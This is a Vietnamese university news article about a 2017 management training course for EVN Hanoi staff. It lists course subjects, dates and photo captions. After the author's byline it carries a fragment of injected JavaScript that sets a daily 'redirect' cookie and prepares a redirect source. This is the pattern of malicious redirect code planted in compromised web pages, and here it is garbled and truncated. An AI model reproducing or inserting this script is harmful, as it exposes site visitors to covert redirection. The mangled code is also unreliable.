Ngày 1910/2EVN-HN 1017, Khoa Quản trị và Kinh doanh khai giảng Chương trình đào tạo Quản trị doanh nghiệp cơ bản dành cho cán bộ quản lý cấp 4 của TCT Điện lực TP Hà Nội (EVN Hà Nội).

50 học viên tham dự Khóa học được tiếp cận với các môn học về Quản trị Doanh nghiệp như: Quản trị dự án và thẩm định dự án đầu tư; Phương pháp xây dựng và đánh giá thành tích nhân viên (KPIs đối với nhân viên; lập danh mục chức danh công việc; v.v.); Lập kế hoạch và điều hành sản xuất hiệu quả; Chia sẻ về Cách mạng công nghiệp 4.0; Văn hóa, thương hiệu và truyền thông doanh nghiệp…
Đây là những môn học cung cấp cho học viên là các cán bộ quản lý của EVN Hà Nội những tri thức và cách nhìn mới về quản trị doanh nghiệp tại đơn vị mình.

EVN-HN 1

Các học viên chụp ảnh lưu niệm tại lễ Khai giảng

Để đáp ứng nhu cầu đào tạo nhân sự chất lượng cao của EVN Hà Nội, đội ngũ giảng viên của Khoa Quản trị và Kinh doanh đã lồng ghép những câu chuyện thực tế về quản trị tại các doanh nghiệp, tập đoàn lớn trong nước và quốc tế trong bài giảng. Tính tương tác giữa giảng viên và học viên được chú trọng, các anh chị học viên đều cảm nhận được không khí trao đổi sôi nổi tại giảng đường.

EVN ha noi  2 OK

PGS.TS.Nguyễn Ngọc Thắng với môn học tổng quan về quản trị và các nguyên tắc quản trị hiệu quả

Được biết, đây là hoạt động đào tạo thường niên của EVN Hà Nội tại Khoa Quản trị và Kinh doanh từ năm 2015.
Chương trình diễn ra 2 đợt, đợt 1 từ 19/10 – 24/10/2017, đợt 2 từ 02/11 – 07/11/2017.
Xin kính chúc các Anh/chị học viên của Tổng Công ty Điện lực TP Hà Nội sẽ gặt hái được nhiều tri thức trong Chương trình đào tạo tại Khoa Quản trị và Kinh doanh.

                                                                                                                                              Nguyên Minh

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}